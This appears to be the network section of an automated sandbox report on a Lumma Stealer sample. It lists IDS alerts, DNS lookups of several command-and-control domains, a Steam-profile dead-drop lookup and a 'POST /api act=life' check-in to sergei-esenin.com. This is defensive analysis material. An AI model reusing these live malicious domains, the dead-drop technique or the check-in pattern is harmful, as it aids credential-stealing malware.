2024-10-14T03:07:04.466045+0200	2056485	ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (mobbipenju .store)	1	192.168.2.5	49754	1.1.1.1	53	UDP
2024-10-14T03:07:04.478904+0200	2056483	ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (eaglepawnoy .store)	1	192.168.2.5	59164	1.1.1.1	53	UDP
2024-10-14T03:07:04.489517+0200	2056481	ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (dissapoiznw .store)	1	192.168.2.5	63495	1.1.1.1	53	UDP
2024-10-14T03:07:04.500431+0200	2056479	ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (studennotediw .store)	1	192.168.2.5	65071	1.1.1.1	53	UDP
2024-10-14T03:07:04.511402+0200	2056477	ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (bathdoomgaz .store)	1	192.168.2.5	59412	1.1.1.1	53	UDP
2024-10-14T03:07:04.521967+0200	2056475	ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (spirittunek .store)	1	192.168.2.5	52261	1.1.1.1	53	UDP
2024-10-14T03:07:04.538425+0200	2056473	ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (licendfilteo .site)	1	192.168.2.5	50693	1.1.1.1	53	UDP
2024-10-14T03:07:06.092766+0200	2858666	ETPRO MALWARE Win32/Lumma Stealer Steam Profile Lookup	1	192.168.2.5	49704	104.102.49.254	443	TCP
2024-10-14T03:07:06.913358+0200	2049836	ET MALWARE Lumma Stealer Related Activity	1	192.168.2.5	49705	172.67.206.204	443	TCP
2024-10-14T03:07:06.913358+0200	2054653	ET MALWARE Lumma Stealer CnC Host Checkin	1	192.168.2.5	49705	172.67.206.204	443	TCP
2024-10-14T03:07:07.896768+0200	2049812	ET MALWARE Lumma Stealer Related Activity M2	1	192.168.2.5	49706	172.67.206.204	443	TCP
2024-10-14T03:07:07.896768+0200	2054653	ET MALWARE Lumma Stealer CnC Host Checkin	1	192.168.2.5	49706	172.67.206.204	443	TCP

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Oct 14, 2024 03:07:04.564343929 CEST	49704	443	192.168.2.5	104.102.49.254
Oct 14, 2024 03:07:04.564366102 CEST	443	49704	104.102.49.254	192.168.2.5
Oct 14, 2024 03:07:04.564452887 CEST	49704	443	192.168.2.5	104.102.49.254
Oct 14, 2024 03:07:04.565525055 CEST	49704	443	192.168.2.5	104.102.49.254
Oct 14, 2024 03:07:04.565537930 CEST	443	49704	104.102.49.254	192.168.2.5
Oct 14, 2024 03:07:05.276902914 CEST	443	49704	104.102.49.254	192.168.2.5
Oct 14, 2024 03:07:05.277024031 CEST	49704	443	192.168.2.5	104.102.49.254
Oct 14, 2024 03:07:05.311922073 CEST	49704	443	192.168.2.5	104.102.49.254
Oct 14, 2024 03:07:05.311956882 CEST	443	49704	104.102.49.254	192.168.2.5
Oct 14, 2024 03:07:05.312967062 CEST	443	49704	104.102.49.254	192.168.2.5
Oct 14, 2024 03:07:05.356853962 CEST	49704	443	192.168.2.5	104.102.49.254
Oct 14, 2024 03:07:05.600523949 CEST	49704	443	192.168.2.5	104.102.49.254
Oct 14, 2024 03:07:05.643450022 CEST	443	49704	104.102.49.254	192.168.2.5
Oct 14, 2024 03:07:06.092797041 CEST	443	49704	104.102.49.254	192.168.2.5
Oct 14, 2024 03:07:06.092838049 CEST	443	49704	104.102.49.254	192.168.2.5
Oct 14, 2024 03:07:06.092892885 CEST	49704	443	192.168.2.5	104.102.49.254
Oct 14, 2024 03:07:06.092904091 CEST	443	49704	104.102.49.254	192.168.2.5
Oct 14, 2024 03:07:06.092916012 CEST	443	49704	104.102.49.254	192.168.2.5
Oct 14, 2024 03:07:06.092922926 CEST	443	49704	104.102.49.254	192.168.2.5
Oct 14, 2024 03:07:06.092931032 CEST	49704	443	192.168.2.5	104.102.49.254
Oct 14, 2024 03:07:06.092972994 CEST	49704	443	192.168.2.5	104.102.49.254
Oct 14, 2024 03:07:06.092972994 CEST	49704	443	192.168.2.5	104.102.49.254
Oct 14, 2024 03:07:06.221043110 CEST	443	49704	104.102.49.254	192.168.2.5
Oct 14, 2024 03:07:06.221066952 CEST	443	49704	104.102.49.254	192.168.2.5
Oct 14, 2024 03:07:06.221153975 CEST	49704	443	192.168.2.5	104.102.49.254
Oct 14, 2024 03:07:06.221160889 CEST	443	49704	104.102.49.254	192.168.2.5
Oct 14, 2024 03:07:06.221226931 CEST	49704	443	192.168.2.5	104.102.49.254
Oct 14, 2024 03:07:06.227977991 CEST	443	49704	104.102.49.254	192.168.2.5
Oct 14, 2024 03:07:06.228039026 CEST	49704	443	192.168.2.5	104.102.49.254
Oct 14, 2024 03:07:06.228043079 CEST	443	49704	104.102.49.254	192.168.2.5
Oct 14, 2024 03:07:06.228076935 CEST	49704	443	192.168.2.5	104.102.49.254
Oct 14, 2024 03:07:06.228079081 CEST	443	49704	104.102.49.254	192.168.2.5
Oct 14, 2024 03:07:06.228120089 CEST	49704	443	192.168.2.5	104.102.49.254
Oct 14, 2024 03:07:06.228591919 CEST	49704	443	192.168.2.5	104.102.49.254
Oct 14, 2024 03:07:06.228605986 CEST	443	49704	104.102.49.254	192.168.2.5
Oct 14, 2024 03:07:06.228615046 CEST	49704	443	192.168.2.5	104.102.49.254
Oct 14, 2024 03:07:06.228620052 CEST	443	49704	104.102.49.254	192.168.2.5
Oct 14, 2024 03:07:06.265146971 CEST	49705	443	192.168.2.5	172.67.206.204
Oct 14, 2024 03:07:06.265249014 CEST	443	49705	172.67.206.204	192.168.2.5
Oct 14, 2024 03:07:06.265345097 CEST	49705	443	192.168.2.5	172.67.206.204
Oct 14, 2024 03:07:06.265644073 CEST	49705	443	192.168.2.5	172.67.206.204
Oct 14, 2024 03:07:06.265682936 CEST	443	49705	172.67.206.204	192.168.2.5
Oct 14, 2024 03:07:06.776534081 CEST	443	49705	172.67.206.204	192.168.2.5
Oct 14, 2024 03:07:06.776861906 CEST	49705	443	192.168.2.5	172.67.206.204
Oct 14, 2024 03:07:06.779354095 CEST	49705	443	192.168.2.5	172.67.206.204
Oct 14, 2024 03:07:06.779366016 CEST	443	49705	172.67.206.204	192.168.2.5
Oct 14, 2024 03:07:06.780329943 CEST	443	49705	172.67.206.204	192.168.2.5
Oct 14, 2024 03:07:06.781502008 CEST	49705	443	192.168.2.5	172.67.206.204
Oct 14, 2024 03:07:06.781523943 CEST	49705	443	192.168.2.5	172.67.206.204
Oct 14, 2024 03:07:06.781662941 CEST	443	49705	172.67.206.204	192.168.2.5
Oct 14, 2024 03:07:06.913397074 CEST	443	49705	172.67.206.204	192.168.2.5
Oct 14, 2024 03:07:06.913520098 CEST	443	49705	172.67.206.204	192.168.2.5
Oct 14, 2024 03:07:06.913609028 CEST	443	49705	172.67.206.204	192.168.2.5
Oct 14, 2024 03:07:06.913614035 CEST	49705	443	192.168.2.5	172.67.206.204
Oct 14, 2024 03:07:06.913667917 CEST	443	49705	172.67.206.204	192.168.2.5
Oct 14, 2024 03:07:06.913722038 CEST	49705	443	192.168.2.5	172.67.206.204
Oct 14, 2024 03:07:06.913738012 CEST	443	49705	172.67.206.204	192.168.2.5
Oct 14, 2024 03:07:06.913889885 CEST	443	49705	172.67.206.204	192.168.2.5
Oct 14, 2024 03:07:06.913954973 CEST	49705	443	192.168.2.5	172.67.206.204
Oct 14, 2024 03:07:06.914282084 CEST	49705	443	192.168.2.5	172.67.206.204
Oct 14, 2024 03:07:06.914324045 CEST	443	49705	172.67.206.204	192.168.2.5
Oct 14, 2024 03:07:06.914351940 CEST	49705	443	192.168.2.5	172.67.206.204
Oct 14, 2024 03:07:06.914366961 CEST	443	49705	172.67.206.204	192.168.2.5
Oct 14, 2024 03:07:06.967988968 CEST	49706	443	192.168.2.5	172.67.206.204
Oct 14, 2024 03:07:06.968063116 CEST	443	49706	172.67.206.204	192.168.2.5
Oct 14, 2024 03:07:06.968162060 CEST	49706	443	192.168.2.5	172.67.206.204
Oct 14, 2024 03:07:06.968508959 CEST	49706	443	192.168.2.5	172.67.206.204
Oct 14, 2024 03:07:06.968542099 CEST	443	49706	172.67.206.204	192.168.2.5
Oct 14, 2024 03:07:07.464260101 CEST	443	49706	172.67.206.204	192.168.2.5
Oct 14, 2024 03:07:07.464704037 CEST	49706	443	192.168.2.5	172.67.206.204
Oct 14, 2024 03:07:07.465655088 CEST	49706	443	192.168.2.5	172.67.206.204
Oct 14, 2024 03:07:07.465713024 CEST	443	49706	172.67.206.204	192.168.2.5
Oct 14, 2024 03:07:07.466506958 CEST	443	49706	172.67.206.204	192.168.2.5
Oct 14, 2024 03:07:07.467622042 CEST	49706	443	192.168.2.5	172.67.206.204
Oct 14, 2024 03:07:07.467622042 CEST	49706	443	192.168.2.5	172.67.206.204
Oct 14, 2024 03:07:07.467829943 CEST	443	49706	172.67.206.204	192.168.2.5
Oct 14, 2024 03:07:07.896847963 CEST	443	49706	172.67.206.204	192.168.2.5
Oct 14, 2024 03:07:07.897171021 CEST	443	49706	172.67.206.204	192.168.2.5
Oct 14, 2024 03:07:07.897253990 CEST	49706	443	192.168.2.5	172.67.206.204
Oct 14, 2024 03:07:07.897339106 CEST	49706	443	192.168.2.5	172.67.206.204
Oct 14, 2024 03:07:07.897388935 CEST	443	49706	172.67.206.204	192.168.2.5
Oct 14, 2024 03:07:07.897419930 CEST	49706	443	192.168.2.5	172.67.206.204
Oct 14, 2024 03:07:07.897434950 CEST	443	49706	172.67.206.204	192.168.2.5

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Oct 14, 2024 03:07:04.451545000 CEST	65430	53	192.168.2.5	1.1.1.1
Oct 14, 2024 03:07:04.462306023 CEST	53	65430	1.1.1.1	192.168.2.5
Oct 14, 2024 03:07:04.466044903 CEST	49754	53	192.168.2.5	1.1.1.1
Oct 14, 2024 03:07:04.476713896 CEST	53	49754	1.1.1.1	192.168.2.5
Oct 14, 2024 03:07:04.478904009 CEST	59164	53	192.168.2.5	1.1.1.1
Oct 14, 2024 03:07:04.487423897 CEST	53	59164	1.1.1.1	192.168.2.5
Oct 14, 2024 03:07:04.489516973 CEST	63495	53	192.168.2.5	1.1.1.1
Oct 14, 2024 03:07:04.498266935 CEST	53	63495	1.1.1.1	192.168.2.5
Oct 14, 2024 03:07:04.500431061 CEST	65071	53	192.168.2.5	1.1.1.1
Oct 14, 2024 03:07:04.509326935 CEST	53	65071	1.1.1.1	192.168.2.5
Oct 14, 2024 03:07:04.511401892 CEST	59412	53	192.168.2.5	1.1.1.1
Oct 14, 2024 03:07:04.519844055 CEST	53	59412	1.1.1.1	192.168.2.5
Oct 14, 2024 03:07:04.521966934 CEST	52261	53	192.168.2.5	1.1.1.1
Oct 14, 2024 03:07:04.536341906 CEST	53	52261	1.1.1.1	192.168.2.5
Oct 14, 2024 03:07:04.538424969 CEST	50693	53	192.168.2.5	1.1.1.1
Oct 14, 2024 03:07:04.548517942 CEST	53	50693	1.1.1.1	192.168.2.5
Oct 14, 2024 03:07:04.552383900 CEST	59354	53	192.168.2.5	1.1.1.1
Oct 14, 2024 03:07:04.559191942 CEST	53	59354	1.1.1.1	192.168.2.5
Oct 14, 2024 03:07:06.253433943 CEST	59362	53	192.168.2.5	1.1.1.1
Oct 14, 2024 03:07:06.264498949 CEST	53	59362	1.1.1.1	192.168.2.5

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Oct 14, 2024 03:07:04.451545000 CEST	192.168.2.5	1.1.1.1	0xeecc	Standard query (0)	clearancek.site	A (IP address)	IN (0x0001)	false
Oct 14, 2024 03:07:04.466044903 CEST	192.168.2.5	1.1.1.1	0x4f99	Standard query (0)	mobbipenju.store	A (IP address)	IN (0x0001)	false
Oct 14, 2024 03:07:04.478904009 CEST	192.168.2.5	1.1.1.1	0x7922	Standard query (0)	eaglepawnoy.store	A (IP address)	IN (0x0001)	false
Oct 14, 2024 03:07:04.489516973 CEST	192.168.2.5	1.1.1.1	0x494b	Standard query (0)	dissapoiznw.store	A (IP address)	IN (0x0001)	false
Oct 14, 2024 03:07:04.500431061 CEST	192.168.2.5	1.1.1.1	0x179c	Standard query (0)	studennotediw.store	A (IP address)	IN (0x0001)	false
Oct 14, 2024 03:07:04.511401892 CEST	192.168.2.5	1.1.1.1	0x4b23	Standard query (0)	bathdoomgaz.store	A (IP address)	IN (0x0001)	false
Oct 14, 2024 03:07:04.521966934 CEST	192.168.2.5	1.1.1.1	0x5f1	Standard query (0)	spirittunek.store	A (IP address)	IN (0x0001)	false
Oct 14, 2024 03:07:04.538424969 CEST	192.168.2.5	1.1.1.1	0xf1f3	Standard query (0)	licendfilteo.site	A (IP address)	IN (0x0001)	false
Oct 14, 2024 03:07:04.552383900 CEST	192.168.2.5	1.1.1.1	0xa4a8	Standard query (0)	steamcommunity.com	A (IP address)	IN (0x0001)	false
Oct 14, 2024 03:07:06.253433943 CEST	192.168.2.5	1.1.1.1	0x7450	Standard query (0)	sergei-esenin.com	A (IP address)	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class	DNS over HTTPS
Oct 14, 2024 03:07:04.462306023 CEST	1.1.1.1	192.168.2.5	0xeecc	Name error (3)	clearancek.site	none	none	A (IP address)	IN (0x0001)	false
Oct 14, 2024 03:07:04.476713896 CEST	1.1.1.1	192.168.2.5	0x4f99	Name error (3)	mobbipenju.store	none	none	A (IP address)	IN (0x0001)	false
Oct 14, 2024 03:07:04.487423897 CEST	1.1.1.1	192.168.2.5	0x7922	Name error (3)	eaglepawnoy.store	none	none	A (IP address)	IN (0x0001)	false
Oct 14, 2024 03:07:04.498266935 CEST	1.1.1.1	192.168.2.5	0x494b	Name error (3)	dissapoiznw.store	none	none	A (IP address)	IN (0x0001)	false
Oct 14, 2024 03:07:04.509326935 CEST	1.1.1.1	192.168.2.5	0x179c	Name error (3)	studennotediw.store	none	none	A (IP address)	IN (0x0001)	false
Oct 14, 2024 03:07:04.519844055 CEST	1.1.1.1	192.168.2.5	0x4b23	Name error (3)	bathdoomgaz.store	none	none	A (IP address)	IN (0x0001)	false
Oct 14, 2024 03:07:04.536341906 CEST	1.1.1.1	192.168.2.5	0x5f1	Name error (3)	spirittunek.store	none	none	A (IP address)	IN (0x0001)	false
Oct 14, 2024 03:07:04.548517942 CEST	1.1.1.1	192.168.2.5	0xf1f3	Name error (3)	licendfilteo.site	none	none	A (IP address)	IN (0x0001)	false
Oct 14, 2024 03:07:04.559191942 CEST	1.1.1.1	192.168.2.5	0xa4a8	No error (0)	steamcommunity.com		104.102.49.254	A (IP address)	IN (0x0001)	false
Oct 14, 2024 03:07:06.264498949 CEST	1.1.1.1	192.168.2.5	0x7450	No error (0)	sergei-esenin.com		172.67.206.204	A (IP address)	IN (0x0001)	false
Oct 14, 2024 03:07:06.264498949 CEST	1.1.1.1	192.168.2.5	0x7450	No error (0)	sergei-esenin.com		104.21.53.8	A (IP address)	IN (0x0001)	false

HTTP Request Dependency Graph

steamcommunity.com

sergei-esenin.com

HTTPS Proxied Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.5	49704	104.102.49.254	443	5040	C:\Users\user\Desktop\file.exe

Timestamp	Bytes transferred	Direction	Data
2024-10-14 01:07:05 UTC	219	OUT	GET /profiles/76561199724331900 HTTP/1.1 Connection: Keep-Alive User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Host: steamcommunity.com
2024-10-14 01:07:06 UTC	1870	IN	HTTP/1.1 200 OK Server: nginx Content-Type: text/html; charset=UTF-8 Content-Security-Policy: default-src blob: data: https: 'unsafe-inline' 'unsafe-eval'; script-src 'self' 'unsafe-inline' 'unsafe-eval' https://community.akamai.steamstatic.com/ https://cdn.akamai.steamstatic.com/steamcommunity/public/assets/ https://api.steampowered.com/ https://recaptcha.net https://www.google.com/recaptcha/ https://www.gstatic.cn/recaptcha/ https://www.gstatic.com/recaptcha/ https://www.youtube.com/ https://s.ytimg.com; object-src 'none'; connect-src 'self' https://community.akamai.steamstatic.com/ https://store.steampowered.com/ https://checkout.steampowered.com/ wss://community.steam-api.com/websocket/ https://api.steampowered.com/ https://login.steampowered.com/ https://help.steampowered.com/ https://steam.tv/ https://steamcommunity.com/ https://.valvesoftware.com https://.steambeta.net https://.discovery.beta.steamserver.net https://.steamcontent.com https://steambroadcast.akamaized.net https://steambroadcast-test.akamaized.net https://broadcast.st.dl.eccdnx.com https://lv.queniujq. [TRUNCATED] Expires: Mon, 26 Jul 1997 05:00:00 GMT Cache-Control: no-cache Date: Mon, 14 Oct 2024 01:07:05 GMT Content-Length: 34837 Connection: close Set-Cookie: sessionid=4fbcd6a99d56aa7fbda5d435; Path=/; Secure; SameSite=None Set-Cookie: steamCountry=US%7Cd7fb65801182a5f50a3169fe2a0b7ef0; Path=/; Secure; HttpOnly; SameSite=None
2024-10-14 01:07:06 UTC	14514	IN	Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 20 72 65 73 70 6f 6e 73 69 76 65 22 20 6c 61 6e 67 3d 22 65 6e 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 3e 0d 0a 09 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0d 0a 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 74 68 65 6d 65 2d 63 6f 6c 6f 72 22 20 63 6f 6e 74 65 6e 74 3d 22 23 31 37 31 61 32 31 22 3e 0d 0a 09 09 3c Data Ascii: <!DOCTYPE html><html class=" responsive" lang="en"><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8"><meta name="viewport" content="width=device-width,initial-scale=1"><meta name="theme-color" content="#171a21"><
2024-10-14 01:07:06 UTC	16384	IN	Data Raw: 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 0d 0a 09 09 6a 51 75 65 72 79 28 66 75 6e 63 74 69 6f 6e 28 24 29 20 7b 0d 0a 09 09 09 24 28 27 23 67 6c 6f 62 61 6c 5f 68 65 61 64 65 72 20 2e 73 75 70 65 72 6e 61 76 27 29 2e 76 5f 74 6f 6f 6c 74 69 70 28 7b 27 6c 6f 63 61 74 69 6f 6e 27 3a 27 62 6f 74 74 6f 6d 27 2c 20 27 64 65 73 74 72 6f 79 57 68 65 6e 44 6f 6e 65 27 3a 20 66 61 6c 73 65 2c 20 27 74 6f 6f 6c 74 69 70 43 6c 61 73 73 27 3a 20 27 73 75 70 65 72 6e 61 76 5f 63 6f 6e 74 65 6e 74 27 2c 20 27 6f 66 66 73 65 74 59 27 3a 2d 36 2c 20 27 6f 66 66 73 65 74 58 27 3a 20 31 2c 20 27 68 6f 72 69 7a 6f 6e 74 61 6c 53 6e 61 70 27 3a 20 34 2c 20 27 74 6f 6f 6c 74 69 70 50 61 72 65 6e 74 27 3a 20 27 23 67 6c 6f Data Ascii: <script type="text/javascript">jQuery(function($) {$('#global_header .supernav').v_tooltip({'location':'bottom', 'destroyWhenDone': false, 'tooltipClass': 'supernav_content', 'offsetY':-6, 'offsetX': 1, 'horizontalSnap': 4, 'tooltipParent': '#glo
2024-10-14 01:07:06 UTC	3768	IN	Data Raw: 09 09 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 70 72 6f 66 69 6c 65 5f 73 75 6d 6d 61 72 79 5f 66 6f 6f 74 65 72 22 3e 0d 0a 09 09 09 09 09 09 09 3c 73 70 61 6e 20 64 61 74 61 2d 70 61 6e 65 6c 3d 22 7b 26 71 75 6f 74 3b 66 6f 63 75 73 61 62 6c 65 26 71 75 6f 74 3b 3a 74 72 75 65 2c 26 71 75 6f 74 3b 63 6c 69 63 6b 4f 6e 41 63 74 69 76 61 74 65 26 71 75 6f 74 3b 3a 74 72 75 65 7d 22 20 63 6c 61 73 73 3d 22 77 68 69 74 65 4c 69 6e 6b 22 20 63 6c 61 73 73 3d 22 77 68 69 74 65 4c 69 6e 6b 22 3e 56 69 65 77 20 6d 6f 72 65 20 69 6e 66 6f 3c 2f 73 70 61 6e 3e 0d 0a 09 09 09 09 09 09 3c 2f 64 69 76 3e 0d 0a 09 09 09 09 09 09 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 20 24 4a 28 20 66 75 6e 63 74 69 6f 6e 28 29 Data Ascii: <div class="profile_summary_footer"><span data-panel="{"focusable":true,"clickOnActivate":true}" class="whiteLink" class="whiteLink">View more info</span></div><script type="text/javascript"> $J( function()
2024-10-14 01:07:06 UTC	171	IN	Data Raw: 09 3c 73 70 61 6e 3e 56 69 65 77 20 6d 6f 62 69 6c 65 20 77 65 62 73 69 74 65 3c 2f 73 70 61 6e 3e 0d 0a 09 09 09 09 3c 2f 64 69 76 3e 0d 0a 09 09 09 3c 2f 64 69 76 3e 0d 0a 09 09 09 3c 2f 64 69 76 3e 0d 0a 09 0d 0a 09 3c 2f 64 69 76 3e 09 3c 21 2d 2d 20 72 65 73 70 6f 6e 73 69 76 65 5f 70 61 67 65 5f 63 6f 6e 74 65 6e 74 20 2d 2d 3e 0d 0a 0d 0a 3c 2f 64 69 76 3e 09 3c 21 2d 2d 20 72 65 73 70 6f 6e 73 69 76 65 5f 70 61 67 65 5f 66 72 61 6d 65 20 2d 2d 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e Data Ascii: <span>View mobile website</span></div></div></div></div>... responsive_page_content --></div>... responsive_page_frame --></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1	192.168.2.5	49705	172.67.206.204	443	5040	C:\Users\user\Desktop\file.exe

Timestamp	Bytes transferred	Direction	Data
2024-10-14 01:07:06 UTC	264	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 8 Host: sergei-esenin.com
2024-10-14 01:07:06 UTC	8	OUT	Data Raw: 61 63 74 3d 6c 69 66 65 Data Ascii: act=life
2024-10-14 01:07:06 UTC	553	IN	HTTP/1.1 200 OK Date: Mon, 14 Oct 2024 01:07:06 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close X-Frame-Options: SAMEORIGIN Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=k3yW00rIfLnetmu2z3fo5NOwmyygNncVFZPQbHzqSrjVqg5Y%2BANJEccrnSFTZgrWX8eaybmA91mNvSWkCW37NWF8bqw%2FUJNHP1HanT%2FOFslh8PaPM8ayGd4H52TFqmn7uWFFJA%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8d23abafded10f9b-EWR
2024-10-14 01:07:06 UTC	816	IN	Data Raw: 31 31 35 31 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 21 2d 2d 5b 69 66 20 6c 74 20 49 45 20 37 5d 3e 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 36 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 37 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 37 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 38 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 38 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 Data Ascii: 1151<!DOCTYPE html>...[if lt IE 7]> <html class="no-js ie6 oldie" lang="en-US"> <![endif]-->...[if IE 7]> <html class="no-js ie7 oldie" lang="en-US"> <![endif]-->...[if IE 8]> <html class="no-js ie8 oldie" lang="en-US"> <![endif]-->...[if
2024-10-14 01:07:06 UTC	1369	IN	Data Raw: 73 2f 63 66 2e 65 72 72 6f 72 73 2e 69 65 2e 63 73 73 22 20 2f 3e 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 73 74 79 6c 65 3e 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 3c 2f 73 74 79 6c 65 3e 0a 0a 0a 3c 21 2d 2d 5b 69 66 20 67 74 65 20 49 45 20 31 30 5d 3e 3c 21 2d 2d 3e 0a 3c 73 63 72 69 70 74 3e 0a 20 20 69 66 20 28 21 6e 61 76 69 67 61 74 6f 72 2e 63 6f 6f 6b 69 65 45 6e 61 62 6c 65 64 29 20 7b 0a 20 20 20 20 77 69 6e 64 6f 77 2e 61 64 64 45 76 65 6e 74 4c 69 73 74 65 6e 65 72 28 27 44 4f 4d 43 6f 6e 74 65 6e 74 4c 6f 61 64 65 64 27 2c 20 66 75 6e 63 74 69 6f 6e 20 28 29 20 7b 0a 20 20 20 20 20 20 76 61 72 20 63 6f 6f 6b 69 65 45 6c 20 3d 20 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 27 63 6f Data Ascii: s/cf.errors.ie.css" /><![endif]--><style>body{margin:0;padding:0}</style>...[if gte IE 10]>...><script> if (!navigator.cookieEnabled) { window.addEventListener('DOMContentLoaded', function () { var cookieEl = document.getElementById('co
2024-10-14 01:07:06 UTC	1369	IN	Data Raw: 65 6d 65 6e 74 2f 70 68 69 73 68 69 6e 67 2d 61 74 74 61 63 6b 2f 22 20 63 6c 61 73 73 3d 22 63 66 2d 62 74 6e 22 20 73 74 79 6c 65 3d 22 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 34 30 34 30 34 30 3b 20 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 20 62 6f 72 64 65 72 3a 20 30 3b 22 3e 4c 65 61 72 6e 20 4d 6f 72 65 3c 2f 61 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 66 6f 72 6d 20 61 63 74 69 6f 6e 3d 22 2f 63 64 6e 2d 63 67 69 2f 70 68 69 73 68 2d 62 79 70 61 73 73 22 20 6d 65 74 68 6f 64 3d 22 47 45 54 22 20 65 6e 63 74 79 70 65 3d 22 74 65 78 74 2f 70 6c 61 69 6e 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 69 6e 70 Data Ascii: ement/phishing-attack/" class="cf-btn" style="background-color: #404040; color: #fff; border: 0;">Learn More</a> <form action="/cdn-cgi/phish-bypass" method="GET" enctype="text/plain"> <inp
2024-10-14 01:07:06 UTC	887	IN	Data Raw: 20 20 20 20 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 63 66 2d 66 6f 6f 74 65 72 2d 73 65 70 61 72 61 74 6f 72 20 73 6d 3a 68 69 64 64 65 6e 22 3e 26 62 75 6c 6c 3b 3c 2f 73 70 61 6e 3e 0a 20 20 20 20 3c 2f 73 70 61 6e 3e 0a 20 20 20 20 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 63 66 2d 66 6f 6f 74 65 72 2d 69 74 65 6d 20 73 6d 3a 62 6c 6f 63 6b 20 73 6d 3a 6d 62 2d 31 22 3e 3c 73 70 61 6e 3e 50 65 72 66 6f 72 6d 61 6e 63 65 20 26 61 6d 70 3b 20 73 65 63 75 72 69 74 79 20 62 79 3c 2f 73 70 61 6e 3e 20 3c 61 20 72 65 6c 3d 22 6e 6f 6f 70 65 6e 65 72 20 6e 6f 72 65 66 65 72 72 65 72 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 2f 35 78 78 2d 65 72 72 6f 72 2d 6c 61 6e 64 69 6e 67 22 20 69 64 3d 22 62 72 61 Data Ascii: <span class="cf-footer-separator sm:hidden">•</span> </span> <span class="cf-footer-item sm:block sm:mb-1"><span>Performance & security by</span> <a rel="noopener noreferrer" href="https://www.cloudflare.com/5xx-error-landing" id="bra
